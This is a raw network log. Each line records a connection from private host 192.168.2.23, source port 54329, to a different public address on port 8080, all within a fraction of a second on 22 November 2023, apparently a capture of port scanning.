Nov 22, 2023 08:37:48.401874065 CET	54329	8080	192.168.2.23	95.54.153.24
Nov 22, 2023 08:37:48.401874065 CET	54329	8080	192.168.2.23	85.110.159.135
Nov 22, 2023 08:37:48.401874065 CET	54329	8080	192.168.2.23	94.55.125.242
Nov 22, 2023 08:37:48.401885033 CET	54329	8080	192.168.2.23	94.101.60.222
Nov 22, 2023 08:37:48.401899099 CET	54329	8080	192.168.2.23	31.15.220.25
Nov 22, 2023 08:37:48.401900053 CET	54329	8080	192.168.2.23	94.7.89.73
Nov 22, 2023 08:37:48.401915073 CET	54329	8080	192.168.2.23	95.114.129.111
Nov 22, 2023 08:37:48.401926994 CET	54329	8080	192.168.2.23	62.129.97.5
Nov 22, 2023 08:37:48.401926994 CET	54329	8080	192.168.2.23	85.28.38.8
Nov 22, 2023 08:37:48.401937962 CET	54329	8080	192.168.2.23	85.137.66.102
Nov 22, 2023 08:37:48.401958942 CET	54329	8080	192.168.2.23	95.29.90.131
Nov 22, 2023 08:37:48.401958942 CET	54329	8080	192.168.2.23	31.186.92.207
Nov 22, 2023 08:37:48.401959896 CET	54329	8080	192.168.2.23	31.39.220.70
Nov 22, 2023 08:37:48.401964903 CET	54329	8080	192.168.2.23	95.55.100.37
Nov 22, 2023 08:37:48.401969910 CET	54329	8080	192.168.2.23	94.217.239.188
Nov 22, 2023 08:37:48.401978970 CET	54329	8080	192.168.2.23	85.3.75.91
Nov 22, 2023 08:37:48.401979923 CET	54329	8080	192.168.2.23	85.8.76.115
Nov 22, 2023 08:37:48.401983023 CET	54329	8080	192.168.2.23	94.47.68.175
Nov 22, 2023 08:37:48.402004004 CET	54329	8080	192.168.2.23	94.160.177.130
Nov 22, 2023 08:37:48.402009010 CET	54329	8080	192.168.2.23	62.198.156.0
Nov 22, 2023 08:37:48.402009964 CET	54329	8080	192.168.2.23	31.50.217.127
Nov 22, 2023 08:37:48.402019978 CET	54329	8080	192.168.2.23	85.173.54.135
Nov 22, 2023 08:37:48.402029991 CET	54329	8080	192.168.2.23	31.123.106.1
Nov 22, 2023 08:37:48.402034998 CET	54329	8080	192.168.2.23	62.187.196.151
Nov 22, 2023 08:37:48.402044058 CET	54329	8080	192.168.2.23	62.157.6.110
Nov 22, 2023 08:37:48.402044058 CET	54329	8080	192.168.2.23	31.5.210.200
Nov 22, 2023 08:37:48.402056932 CET	54329	8080	192.168.2.23	31.111.180.85
Nov 22, 2023 08:37:48.402067900 CET	54329	8080	192.168.2.23	94.250.67.180
Nov 22, 2023 08:37:48.402077913 CET	54329	8080	192.168.2.23	95.105.59.49
Nov 22, 2023 08:37:48.402077913 CET	54329	8080	192.168.2.23	62.74.5.66
Nov 22, 2023 08:37:48.402082920 CET	54329	8080	192.168.2.23	62.240.237.38
Nov 22, 2023 08:37:48.402089119 CET	54329	8080	192.168.2.23	85.178.155.46
Nov 22, 2023 08:37:48.402092934 CET	54329	8080	192.168.2.23	94.32.255.46
Nov 22, 2023 08:37:48.402095079 CET	54329	8080	192.168.2.23	94.105.190.143
Nov 22, 2023 08:37:48.402097940 CET	54329	8080	192.168.2.23	62.10.127.243
Nov 22, 2023 08:37:48.402106047 CET	54329	8080	192.168.2.23	31.60.128.213
Nov 22, 2023 08:37:48.402106047 CET	54329	8080	192.168.2.23	31.203.99.137
Nov 22, 2023 08:37:48.402117968 CET	54329	8080	192.168.2.23	85.76.113.23
Nov 22, 2023 08:37:48.402123928 CET	54329	8080	192.168.2.23	62.219.119.90
Nov 22, 2023 08:37:48.402142048 CET	54329	8080	192.168.2.23	85.134.89.181
Nov 22, 2023 08:37:48.402146101 CET	54329	8080	192.168.2.23	94.243.253.207
Nov 22, 2023 08:37:48.402146101 CET	54329	8080	192.168.2.23	31.184.149.106
Nov 22, 2023 08:37:48.402153015 CET	54329	8080	192.168.2.23	85.179.230.161
Nov 22, 2023 08:37:48.402169943 CET	54329	8080	192.168.2.23	94.101.89.7
Nov 22, 2023 08:37:48.402169943 CET	54329	8080	192.168.2.23	95.66.146.219
Nov 22, 2023 08:37:48.402188063 CET	54329	8080	192.168.2.23	31.51.139.163
Nov 22, 2023 08:37:48.402190924 CET	54329	8080	192.168.2.23	95.100.254.22
Nov 22, 2023 08:37:48.402195930 CET	54329	8080	192.168.2.23	94.3.133.9
Nov 22, 2023 08:37:48.402195930 CET	54329	8080	192.168.2.23	62.168.13.145
Nov 22, 2023 08:37:48.402209044 CET	54329	8080	192.168.2.23	62.130.187.37
Nov 22, 2023 08:37:48.402218103 CET	54329	8080	192.168.2.23	62.25.2.70
Nov 22, 2023 08:37:48.402225018 CET	54329	8080	192.168.2.23	85.243.205.204
Nov 22, 2023 08:37:48.402226925 CET	54329	8080	192.168.2.23	62.222.163.47
Nov 22, 2023 08:37:48.402241945 CET	54329	8080	192.168.2.23	31.83.96.95
Nov 22, 2023 08:37:48.402241945 CET	54329	8080	192.168.2.23	95.27.109.230
Nov 22, 2023 08:37:48.402241945 CET	54329	8080	192.168.2.23	85.148.198.250
Nov 22, 2023 08:37:48.402247906 CET	54329	8080	192.168.2.23	62.113.250.97
Nov 22, 2023 08:37:48.402261019 CET	54329	8080	192.168.2.23	94.67.246.235
Nov 22, 2023 08:37:48.402261972 CET	54329	8080	192.168.2.23	94.245.169.211
Nov 22, 2023 08:37:48.402267933 CET	54329	8080	192.168.2.23	31.174.252.89
Nov 22, 2023 08:37:48.402276039 CET	54329	8080	192.168.2.23	62.202.244.79
Nov 22, 2023 08:37:48.402280092 CET	54329	8080	192.168.2.23	62.243.97.10
Nov 22, 2023 08:37:48.402282000 CET	54329	8080	192.168.2.23	95.129.20.68
Nov 22, 2023 08:37:48.402302027 CET	54329	8080	192.168.2.23	31.110.48.69
Nov 22, 2023 08:37:48.402302027 CET	54329	8080	192.168.2.23	31.219.121.192
Nov 22, 2023 08:37:48.402303934 CET	54329	8080	192.168.2.23	94.177.202.53
Nov 22, 2023 08:37:48.402311087 CET	54329	8080	192.168.2.23	31.49.202.52
Nov 22, 2023 08:37:48.402316093 CET	54329	8080	192.168.2.23	62.11.190.42
Nov 22, 2023 08:37:48.402323961 CET	54329	8080	192.168.2.23	85.16.217.96
Nov 22, 2023 08:37:48.402323961 CET	54329	8080	192.168.2.23	94.85.253.109
Nov 22, 2023 08:37:48.402329922 CET	54329	8080	192.168.2.23	31.86.72.106
Nov 22, 2023 08:37:48.402339935 CET	54329	8080	192.168.2.23	94.11.33.96
Nov 22, 2023 08:37:48.402343035 CET	54329	8080	192.168.2.23	85.97.113.175
Nov 22, 2023 08:37:48.402359009 CET	54329	8080	192.168.2.23	85.15.48.15
Nov 22, 2023 08:37:48.402362108 CET	54329	8080	192.168.2.23	31.50.120.104
Nov 22, 2023 08:37:48.402362108 CET	54329	8080	192.168.2.23	94.76.160.156
Nov 22, 2023 08:37:48.402362108 CET	54329	8080	192.168.2.23	85.228.1.135
Nov 22, 2023 08:37:48.402364016 CET	54329	8080	192.168.2.23	85.190.5.114
Nov 22, 2023 08:37:48.402374029 CET	54329	8080	192.168.2.23	94.34.12.78
Nov 22, 2023 08:37:48.402383089 CET	54329	8080	192.168.2.23	62.195.241.109
Nov 22, 2023 08:37:48.402399063 CET	54329	8080	192.168.2.23	94.95.86.197
Nov 22, 2023 08:37:48.402399063 CET	54329	8080	192.168.2.23	95.12.33.193
Nov 22, 2023 08:37:48.402410030 CET	54329	8080	192.168.2.23	31.43.63.15
Nov 22, 2023 08:37:48.402419090 CET	54329	8080	192.168.2.23	95.185.225.169
Nov 22, 2023 08:37:48.402430058 CET	54329	8080	192.168.2.23	62.207.76.228
Nov 22, 2023 08:37:48.402440071 CET	54329	8080	192.168.2.23	95.158.189.255
Nov 22, 2023 08:37:48.402440071 CET	54329	8080	192.168.2.23	85.49.143.76
Nov 22, 2023 08:37:48.402441025 CET	54329	8080	192.168.2.23	62.52.91.135
Nov 22, 2023 08:37:48.402441978 CET	54329	8080	192.168.2.23	94.60.223.176
Nov 22, 2023 08:37:48.402456045 CET	54329	8080	192.168.2.23	31.19.8.145
Nov 22, 2023 08:37:48.402458906 CET	54329	8080	192.168.2.23	62.104.145.11
Nov 22, 2023 08:37:48.402458906 CET	54329	8080	192.168.2.23	94.116.132.86
Nov 22, 2023 08:37:48.402467012 CET	54329	8080	192.168.2.23	85.157.232.14
Nov 22, 2023 08:37:48.402476072 CET	54329	8080	192.168.2.23	94.56.136.207
Nov 22, 2023 08:37:48.402483940 CET	54329	8080	192.168.2.23	31.139.117.104
Nov 22, 2023 08:37:48.402503014 CET	54329	8080	192.168.2.23	95.194.132.217
Nov 22, 2023 08:37:48.402503014 CET	54329	8080	192.168.2.23	85.162.178.26
Nov 22, 2023 08:37:48.402508020 CET	54329	8080	192.168.2.23	31.126.78.82
Nov 22, 2023 08:37:48.402519941 CET	54329	8080	192.168.2.23	95.245.3.0
Nov 22, 2023 08:37:48.402522087 CET	54329	8080	192.168.2.23	94.117.162.120
Nov 22, 2023 08:37:48.402523041 CET	54329	8080	192.168.2.23	95.254.38.190
Nov 22, 2023 08:37:48.402529001 CET	54329	8080	192.168.2.23	95.212.57.212
Nov 22, 2023 08:37:48.402533054 CET	54329	8080	192.168.2.23	95.240.110.60
Nov 22, 2023 08:37:48.402533054 CET	54329	8080	192.168.2.23	95.235.221.142
Nov 22, 2023 08:37:48.402535915 CET	54329	8080	192.168.2.23	85.138.93.184
Nov 22, 2023 08:37:48.402537107 CET	54329	8080	192.168.2.23	31.226.133.27
Nov 22, 2023 08:37:48.402539015 CET	54329	8080	192.168.2.23	31.35.96.138
Nov 22, 2023 08:37:48.402544022 CET	54329	8080	192.168.2.23	31.19.88.111
Nov 22, 2023 08:37:48.402544022 CET	54329	8080	192.168.2.23	95.125.106.131
Nov 22, 2023 08:37:48.402544022 CET	54329	8080	192.168.2.23	85.198.107.57
Nov 22, 2023 08:37:48.402563095 CET	54329	8080	192.168.2.23	62.52.209.55
Nov 22, 2023 08:37:48.402564049 CET	54329	8080	192.168.2.23	85.83.22.97
Nov 22, 2023 08:37:48.402570009 CET	54329	8080	192.168.2.23	94.153.33.225
Nov 22, 2023 08:37:48.402574062 CET	54329	8080	192.168.2.23	85.205.159.241
Nov 22, 2023 08:37:48.402576923 CET	54329	8080	192.168.2.23	95.176.181.92
Nov 22, 2023 08:37:48.402592897 CET	54329	8080	192.168.2.23	94.136.114.3
Nov 22, 2023 08:37:48.402600050 CET	54329	8080	192.168.2.23	95.4.222.213
Nov 22, 2023 08:37:48.402616978 CET	54329	8080	192.168.2.23	85.159.80.35
Nov 22, 2023 08:37:48.402618885 CET	54329	8080	192.168.2.23	95.109.174.208
Nov 22, 2023 08:37:48.402620077 CET	54329	8080	192.168.2.23	95.140.196.195
Nov 22, 2023 08:37:48.402620077 CET	54329	8080	192.168.2.23	31.233.157.144
Nov 22, 2023 08:37:48.402626038 CET	54329	8080	192.168.2.23	62.201.96.97
Nov 22, 2023 08:37:48.402642965 CET	54329	8080	192.168.2.23	95.145.229.241
Nov 22, 2023 08:37:48.402647018 CET	54329	8080	192.168.2.23	94.151.34.50
Nov 22, 2023 08:37:48.402657032 CET	54329	8080	192.168.2.23	95.242.248.180
Nov 22, 2023 08:37:48.402662992 CET	54329	8080	192.168.2.23	85.36.121.227
Nov 22, 2023 08:37:48.402667046 CET	54329	8080	192.168.2.23	85.76.65.11
Nov 22, 2023 08:37:48.402669907 CET	54329	8080	192.168.2.23	85.234.157.192
Nov 22, 2023 08:37:48.402672052 CET	54329	8080	192.168.2.23	31.156.36.173
Nov 22, 2023 08:37:48.402673960 CET	54329	8080	192.168.2.23	95.59.57.88
Nov 22, 2023 08:37:48.402683020 CET	54329	8080	192.168.2.23	85.164.48.82
Nov 22, 2023 08:37:48.402683973 CET	54329	8080	192.168.2.23	31.119.245.169
Nov 22, 2023 08:37:48.402709007 CET	54329	8080	192.168.2.23	95.125.24.27
Nov 22, 2023 08:37:48.402709007 CET	54329	8080	192.168.2.23	31.3.77.238
Nov 22, 2023 08:37:48.402709961 CET	54329	8080	192.168.2.23	62.116.179.162
Nov 22, 2023 08:37:48.402721882 CET	54329	8080	192.168.2.23	31.31.66.110
Nov 22, 2023 08:37:48.402724981 CET	54329	8080	192.168.2.23	31.226.231.208
Nov 22, 2023 08:37:48.402734041 CET	54329	8080	192.168.2.23	94.191.176.213
Nov 22, 2023 08:37:48.402734995 CET	54329	8080	192.168.2.23	31.87.226.173
Nov 22, 2023 08:37:48.402734041 CET	54329	8080	192.168.2.23	62.12.254.211
Nov 22, 2023 08:37:48.402750969 CET	54329	8080	192.168.2.23	62.207.155.216
Nov 22, 2023 08:37:48.402751923 CET	54329	8080	192.168.2.23	94.63.233.57
Nov 22, 2023 08:37:48.402755976 CET	54329	8080	192.168.2.23	31.248.44.71
Nov 22, 2023 08:37:48.402759075 CET	54329	8080	192.168.2.23	31.8.86.98
Nov 22, 2023 08:37:48.402767897 CET	54329	8080	192.168.2.23	85.47.5.5
Nov 22, 2023 08:37:48.402782917 CET	54329	8080	192.168.2.23	31.231.209.92
Nov 22, 2023 08:37:48.402782917 CET	54329	8080	192.168.2.23	62.208.62.112
Nov 22, 2023 08:37:48.402791023 CET	54329	8080	192.168.2.23	62.235.181.136
Nov 22, 2023 08:37:48.402791023 CET	54329	8080	192.168.2.23	62.250.227.37
Nov 22, 2023 08:37:48.402800083 CET	54329	8080	192.168.2.23	62.252.38.77
Nov 22, 2023 08:37:48.402810097 CET	54329	8080	192.168.2.23	31.144.30.110
Nov 22, 2023 08:37:48.402820110 CET	54329	8080	192.168.2.23	94.161.254.5
Nov 22, 2023 08:37:48.402832985 CET	54329	8080	192.168.2.23	85.165.24.121
Nov 22, 2023 08:37:48.402837992 CET	54329	8080	192.168.2.23	95.41.201.244
Nov 22, 2023 08:37:48.402837992 CET	54329	8080	192.168.2.23	94.50.87.249
Nov 22, 2023 08:37:48.402842045 CET	54329	8080	192.168.2.23	94.176.186.239
Nov 22, 2023 08:37:48.402864933 CET	54329	8080	192.168.2.23	62.85.200.62
Nov 22, 2023 08:37:48.402873993 CET	54329	8080	192.168.2.23	62.90.21.105
Nov 22, 2023 08:37:48.402888060 CET	54329	8080	192.168.2.23	62.149.209.197
Nov 22, 2023 08:37:48.402889013 CET	54329	8080	192.168.2.23	62.193.64.140
Nov 22, 2023 08:37:48.402889013 CET	54329	8080	192.168.2.23	31.202.122.92
Nov 22, 2023 08:37:48.402898073 CET	54329	8080	192.168.2.23	85.133.75.56
Nov 22, 2023 08:37:48.402910948 CET	54329	8080	192.168.2.23	62.62.79.206
Nov 22, 2023 08:37:48.402914047 CET	54329	8080	192.168.2.23	94.211.172.152
Nov 22, 2023 08:37:48.402920008 CET	54329	8080	192.168.2.23	85.90.150.96
Nov 22, 2023 08:37:48.402920008 CET	54329	8080	192.168.2.23	95.154.64.242
Nov 22, 2023 08:37:48.402920961 CET	54329	8080	192.168.2.23	95.135.219.74
Nov 22, 2023 08:37:48.402931929 CET	54329	8080	192.168.2.23	62.126.149.17
Nov 22, 2023 08:37:48.402940035 CET	54329	8080	192.168.2.23	31.161.239.115
Nov 22, 2023 08:37:48.402941942 CET	54329	8080	192.168.2.23	94.148.157.204
Nov 22, 2023 08:37:48.402960062 CET	54329	8080	192.168.2.23	31.23.217.79
Nov 22, 2023 08:37:48.402961016 CET	54329	8080	192.168.2.23	85.36.22.56
Nov 22, 2023 08:37:48.402961016 CET	54329	8080	192.168.2.23	31.246.229.212
Nov 22, 2023 08:37:48.402982950 CET	54329	8080	192.168.2.23	94.169.203.140
Nov 22, 2023 08:37:48.402982950 CET	54329	8080	192.168.2.23	62.76.250.21
Nov 22, 2023 08:37:48.403001070 CET	54329	8080	192.168.2.23	31.72.108.60
Nov 22, 2023 08:37:48.403007030 CET	54329	8080	192.168.2.23	95.124.168.248
Nov 22, 2023 08:37:48.403007030 CET	54329	8080	192.168.2.23	85.140.10.121
Nov 22, 2023 08:37:48.403007984 CET	54329	8080	192.168.2.23	85.61.96.104
Nov 22, 2023 08:37:48.403017044 CET	54329	8080	192.168.2.23	62.35.241.240
Nov 22, 2023 08:37:48.403017998 CET	54329	8080	192.168.2.23	85.174.235.166
Nov 22, 2023 08:37:48.403017044 CET	54329	8080	192.168.2.23	31.245.126.104
Nov 22, 2023 08:37:48.403032064 CET	54329	8080	192.168.2.23	85.21.15.158
Nov 22, 2023 08:37:48.403037071 CET	54329	8080	192.168.2.23	62.235.98.108
Nov 22, 2023 08:37:48.403048992 CET	54329	8080	192.168.2.23	94.119.131.91
Nov 22, 2023 08:37:48.403048992 CET	54329	8080	192.168.2.23	62.206.38.191
Nov 22, 2023 08:37:48.403067112 CET	54329	8080	192.168.2.23	31.114.99.185
Nov 22, 2023 08:37:48.403068066 CET	54329	8080	192.168.2.23	94.89.189.248
Nov 22, 2023 08:37:48.403069973 CET	54329	8080	192.168.2.23	95.122.212.196
Nov 22, 2023 08:37:48.403073072 CET	54329	8080	192.168.2.23	94.251.46.77
Nov 22, 2023 08:37:48.403079987 CET	54329	8080	192.168.2.23	95.81.207.45
Nov 22, 2023 08:37:48.403089046 CET	54329	8080	192.168.2.23	85.136.126.32
Nov 22, 2023 08:37:48.403090000 CET	54329	8080	192.168.2.23	85.181.82.224
Nov 22, 2023 08:37:48.403117895 CET	54329	8080	192.168.2.23	62.205.53.88
Nov 22, 2023 08:37:48.403117895 CET	54329	8080	192.168.2.23	94.53.109.148
Nov 22, 2023 08:37:48.403122902 CET	54329	8080	192.168.2.23	62.233.42.142
Nov 22, 2023 08:37:48.403125048 CET	54329	8080	192.168.2.23	85.245.182.139
Nov 22, 2023 08:37:48.403125048 CET	54329	8080	192.168.2.23	94.78.144.46
Nov 22, 2023 08:37:48.403135061 CET	54329	8080	192.168.2.23	94.241.224.59
Nov 22, 2023 08:37:48.403155088 CET	54329	8080	192.168.2.23	95.137.157.225
Nov 22, 2023 08:37:48.403156042 CET	54329	8080	192.168.2.23	85.230.231.10
Nov 22, 2023 08:37:48.403162003 CET	54329	8080	192.168.2.23	95.164.104.75
Nov 22, 2023 08:37:48.403167963 CET	54329	8080	192.168.2.23	95.53.182.236
Nov 22, 2023 08:37:48.403179884 CET	54329	8080	192.168.2.23	94.183.193.218
Nov 22, 2023 08:37:48.403184891 CET	54329	8080	192.168.2.23	31.241.234.77
Nov 22, 2023 08:37:48.403194904 CET	54329	8080	192.168.2.23	85.78.100.33
Nov 22, 2023 08:37:48.403194904 CET	54329	8080	192.168.2.23	31.57.211.52
Nov 22, 2023 08:37:48.403194904 CET	54329	8080	192.168.2.23	31.169.221.33
Nov 22, 2023 08:37:48.403196096 CET	54329	8080	192.168.2.23	31.220.102.249
Nov 22, 2023 08:37:48.403201103 CET	54329	8080	192.168.2.23	94.156.252.25
Nov 22, 2023 08:37:48.403212070 CET	54329	8080	192.168.2.23	85.171.41.75
Nov 22, 2023 08:37:48.403218985 CET	54329	8080	192.168.2.23	62.223.118.162
Nov 22, 2023 08:37:48.403223038 CET	54329	8080	192.168.2.23	95.85.41.29
Nov 22, 2023 08:37:48.403223038 CET	54329	8080	192.168.2.23	95.128.3.246
Nov 22, 2023 08:37:48.403232098 CET	54329	8080	192.168.2.23	62.203.50.156
Nov 22, 2023 08:37:48.403243065 CET	54329	8080	192.168.2.23	95.186.51.40
Nov 22, 2023 08:37:48.403255939 CET	54329	8080	192.168.2.23	95.44.41.237
Nov 22, 2023 08:37:48.403259039 CET	54329	8080	192.168.2.23	85.178.131.0
Nov 22, 2023 08:37:48.403268099 CET	54329	8080	192.168.2.23	85.213.172.60
Nov 22, 2023 08:37:48.403280973 CET	54329	8080	192.168.2.23	95.111.146.221
Nov 22, 2023 08:37:48.403285027 CET	54329	8080	192.168.2.23	85.9.48.99
Nov 22, 2023 08:37:48.403290033 CET	54329	8080	192.168.2.23	31.252.211.221
Nov 22, 2023 08:37:48.403296947 CET	54329	8080	192.168.2.23	31.80.5.84
Nov 22, 2023 08:37:48.403307915 CET	54329	8080	192.168.2.23	94.94.237.175
Nov 22, 2023 08:37:48.403321028 CET	54329	8080	192.168.2.23	95.113.49.163
Nov 22, 2023 08:37:48.403321028 CET	54329	8080	192.168.2.23	85.40.158.126
Nov 22, 2023 08:37:48.403331041 CET	54329	8080	192.168.2.23	94.54.114.219
Nov 22, 2023 08:37:48.403340101 CET	54329	8080	192.168.2.23	31.233.133.53
Nov 22, 2023 08:37:48.403348923 CET	54329	8080	192.168.2.23	85.78.90.196
Nov 22, 2023 08:37:48.403367043 CET	54329	8080	192.168.2.23	31.232.79.79
Nov 22, 2023 08:37:48.403367043 CET	54329	8080	192.168.2.23	62.66.57.217
Nov 22, 2023 08:37:48.403374910 CET	54329	8080	192.168.2.23	31.161.116.172
Nov 22, 2023 08:37:48.403374910 CET	54329	8080	192.168.2.23	62.59.115.114
Nov 22, 2023 08:37:48.403374910 CET	54329	8080	192.168.2.23	94.102.11.56
Nov 22, 2023 08:37:48.403388977 CET	54329	8080	192.168.2.23	95.192.236.171
Nov 22, 2023 08:37:48.403390884 CET	54329	8080	192.168.2.23	95.46.239.8
Nov 22, 2023 08:37:48.403403044 CET	54329	8080	192.168.2.23	95.152.211.42
Nov 22, 2023 08:37:48.403410912 CET	54329	8080	192.168.2.23	95.15.161.168
Nov 22, 2023 08:37:48.403429031 CET	54329	8080	192.168.2.23	94.147.176.45
Nov 22, 2023 08:37:48.403439045 CET	54329	8080	192.168.2.23	95.8.70.38
Nov 22, 2023 08:37:48.403439045 CET	54329	8080	192.168.2.23	31.86.176.108
Nov 22, 2023 08:37:48.403453112 CET	54329	8080	192.168.2.23	94.161.113.216
Nov 22, 2023 08:37:48.403453112 CET	54329	8080	192.168.2.23	62.18.122.252
Nov 22, 2023 08:37:48.403453112 CET	54329	8080	192.168.2.23	62.130.227.42
Nov 22, 2023 08:37:48.403453112 CET	54329	8080	192.168.2.23	95.145.48.181
Nov 22, 2023 08:37:48.403466940 CET	54329	8080	192.168.2.23	94.232.132.240
Nov 22, 2023 08:37:48.403467894 CET	54329	8080	192.168.2.23	94.255.159.92
Nov 22, 2023 08:37:48.403467894 CET	54329	8080	192.168.2.23	95.14.94.70
Nov 22, 2023 08:37:48.403470993 CET	54329	8080	192.168.2.23	85.232.229.85
Nov 22, 2023 08:37:48.403471947 CET	54329	8080	192.168.2.23	94.20.78.43
Nov 22, 2023 08:37:48.403495073 CET	54329	8080	192.168.2.23	62.142.105.221
Nov 22, 2023 08:37:48.403497934 CET	54329	8080	192.168.2.23	62.194.37.168
Nov 22, 2023 08:37:48.403497934 CET	54329	8080	192.168.2.23	95.60.71.3
Nov 22, 2023 08:37:48.403501034 CET	54329	8080	192.168.2.23	94.9.223.207
Nov 22, 2023 08:37:48.403501034 CET	54329	8080	192.168.2.23	85.153.89.100
Nov 22, 2023 08:37:48.403502941 CET	54329	8080	192.168.2.23	95.60.165.87
Nov 22, 2023 08:37:48.403506041 CET	54329	8080	192.168.2.23	85.62.10.183
Nov 22, 2023 08:37:48.403523922 CET	54329	8080	192.168.2.23	94.124.79.91
Nov 22, 2023 08:37:48.403523922 CET	54329	8080	192.168.2.23	94.248.85.49
Nov 22, 2023 08:37:48.403523922 CET	54329	8080	192.168.2.23	95.40.177.31
Nov 22, 2023 08:37:48.403536081 CET	54329	8080	192.168.2.23	95.121.17.25
Nov 22, 2023 08:37:48.403536081 CET	54329	8080	192.168.2.23	94.106.100.106
Nov 22, 2023 08:37:48.403548002 CET	54329	8080	192.168.2.23	94.30.121.92
Nov 22, 2023 08:37:48.403549910 CET	54329	8080	192.168.2.23	62.52.134.23
Nov 22, 2023 08:37:48.403548002 CET	54329	8080	192.168.2.23	85.132.79.163
Nov 22, 2023 08:37:48.403552055 CET	54329	8080	192.168.2.23	62.8.194.129
Nov 22, 2023 08:37:48.403559923 CET	54329	8080	192.168.2.23	85.201.51.215
Nov 22, 2023 08:37:48.403572083 CET	54329	8080	192.168.2.23	94.94.140.167
Nov 22, 2023 08:37:48.403574944 CET	54329	8080	192.168.2.23	62.51.114.64
Nov 22, 2023 08:37:48.403589010 CET	54329	8080	192.168.2.23	31.114.152.21
Nov 22, 2023 08:37:48.403592110 CET	54329	8080	192.168.2.23	31.89.37.65
Nov 22, 2023 08:37:48.403595924 CET	54329	8080	192.168.2.23	95.59.20.91
Nov 22, 2023 08:37:48.403595924 CET	54329	8080	192.168.2.23	62.204.105.103
Nov 22, 2023 08:37:48.403604984 CET	54329	8080	192.168.2.23	62.48.80.64
Nov 22, 2023 08:37:48.403615952 CET	54329	8080	192.168.2.23	94.182.241.35
Nov 22, 2023 08:37:48.403634071 CET	54329	8080	192.168.2.23	94.189.222.0
Nov 22, 2023 08:37:48.403634071 CET	54329	8080	192.168.2.23	94.223.238.105
Nov 22, 2023 08:37:48.403635979 CET	54329	8080	192.168.2.23	94.85.15.18
Nov 22, 2023 08:37:48.403636932 CET	54329	8080	192.168.2.23	62.82.124.221
Nov 22, 2023 08:37:48.403646946 CET	54329	8080	192.168.2.23	62.230.137.72
Nov 22, 2023 08:37:48.403657913 CET	54329	8080	192.168.2.23	95.242.123.216
Nov 22, 2023 08:37:48.403666019 CET	54329	8080	192.168.2.23	31.210.146.112
Nov 22, 2023 08:37:48.403666019 CET	54329	8080	192.168.2.23	62.234.250.14
Nov 22, 2023 08:37:48.403669119 CET	54329	8080	192.168.2.23	31.172.75.43
Nov 22, 2023 08:37:48.403681040 CET	54329	8080	192.168.2.23	85.161.185.205
Nov 22, 2023 08:37:48.403687000 CET	54329	8080	192.168.2.23	62.246.187.88
Nov 22, 2023 08:37:48.403690100 CET	54329	8080	192.168.2.23	94.168.178.138
Nov 22, 2023 08:37:48.403709888 CET	54329	8080	192.168.2.23	31.10.185.64
Nov 22, 2023 08:37:48.403709888 CET	54329	8080	192.168.2.23	85.45.92.66
Nov 22, 2023 08:37:48.403712034 CET	54329	8080	192.168.2.23	31.36.126.30
Nov 22, 2023 08:37:48.403717995 CET	54329	8080	192.168.2.23	85.10.195.90
Nov 22, 2023 08:37:48.403726101 CET	54329	8080	192.168.2.23	94.76.123.116
Nov 22, 2023 08:37:48.403728008 CET	54329	8080	192.168.2.23	95.228.23.225
Nov 22, 2023 08:37:48.403740883 CET	54329	8080	192.168.2.23	95.48.60.73
Nov 22, 2023 08:37:48.403743982 CET	54329	8080	192.168.2.23	94.5.198.84
Nov 22, 2023 08:37:48.403750896 CET	54329	8080	192.168.2.23	31.157.136.159
Nov 22, 2023 08:37:48.403750896 CET	54329	8080	192.168.2.23	95.115.55.101
Nov 22, 2023 08:37:48.403759003 CET	54329	8080	192.168.2.23	31.198.107.124
Nov 22, 2023 08:37:48.403759003 CET	54329	8080	192.168.2.23	94.127.95.94
Nov 22, 2023 08:37:48.403763056 CET	54329	8080	192.168.2.23	94.180.166.78
Nov 22, 2023 08:37:48.403769970 CET	54329	8080	192.168.2.23	85.105.177.204
Nov 22, 2023 08:37:48.403769970 CET	54329	8080	192.168.2.23	85.24.87.93
Nov 22, 2023 08:37:48.403769970 CET	54329	8080	192.168.2.23	31.147.222.201
Nov 22, 2023 08:37:48.403788090 CET	54329	8080	192.168.2.23	95.235.36.49
Nov 22, 2023 08:37:48.403789997 CET	54329	8080	192.168.2.23	31.211.66.191
Nov 22, 2023 08:37:48.403789997 CET	54329	8080	192.168.2.23	85.253.2.41
Nov 22, 2023 08:37:48.403801918 CET	54329	8080	192.168.2.23	31.210.99.72
Nov 22, 2023 08:37:48.403801918 CET	54329	8080	192.168.2.23	94.20.131.130
Nov 22, 2023 08:37:48.403808117 CET	54329	8080	192.168.2.23	31.116.174.158
Nov 22, 2023 08:37:48.403815985 CET	54329	8080	192.168.2.23	85.159.220.154
Nov 22, 2023 08:37:48.403827906 CET	54329	8080	192.168.2.23	95.69.196.70
Nov 22, 2023 08:37:48.403841019 CET	54329	8080	192.168.2.23	62.74.5.174
Nov 22, 2023 08:37:48.403844118 CET	54329	8080	192.168.2.23	85.68.188.40
Nov 22, 2023 08:37:48.403844118 CET	54329	8080	192.168.2.23	95.17.16.37
Nov 22, 2023 08:37:48.403853893 CET	54329	8080	192.168.2.23	94.138.194.215
Nov 22, 2023 08:37:48.403853893 CET	54329	8080	192.168.2.23	85.26.92.150
Nov 22, 2023 08:37:48.403857946 CET	54329	8080	192.168.2.23	95.85.165.141
Nov 22, 2023 08:37:48.403876066 CET	54329	8080	192.168.2.23	31.68.12.244
Nov 22, 2023 08:37:48.403876066 CET	54329	8080	192.168.2.23	31.193.252.194
Nov 22, 2023 08:37:48.403887987 CET	54329	8080	192.168.2.23	95.172.165.27
Nov 22, 2023 08:37:48.403899908 CET	54329	8080	192.168.2.23	62.88.225.217
Nov 22, 2023 08:37:48.403903961 CET	54329	8080	192.168.2.23	95.54.250.133
Nov 22, 2023 08:37:48.403911114 CET	54329	8080	192.168.2.23	95.177.92.56
Nov 22, 2023 08:37:48.403919935 CET	54329	8080	192.168.2.23	85.145.124.176
Nov 22, 2023 08:37:48.403919935 CET	54329	8080	192.168.2.23	31.238.50.55
Nov 22, 2023 08:37:48.403927088 CET	54329	8080	192.168.2.23	31.249.94.192
Nov 22, 2023 08:37:48.403929949 CET	54329	8080	192.168.2.23	85.134.50.157
Nov 22, 2023 08:37:48.403950930 CET	54329	8080	192.168.2.23	94.206.193.71
Nov 22, 2023 08:37:48.403950930 CET	54329	8080	192.168.2.23	62.132.217.254
Nov 22, 2023 08:37:48.403959990 CET	54329	8080	192.168.2.23	31.111.200.183
Nov 22, 2023 08:37:48.403976917 CET	54329	8080	192.168.2.23	31.93.243.229
Nov 22, 2023 08:37:48.403979063 CET	54329	8080	192.168.2.23	62.191.194.33
Nov 22, 2023 08:37:48.403986931 CET	54329	8080	192.168.2.23	62.39.126.197
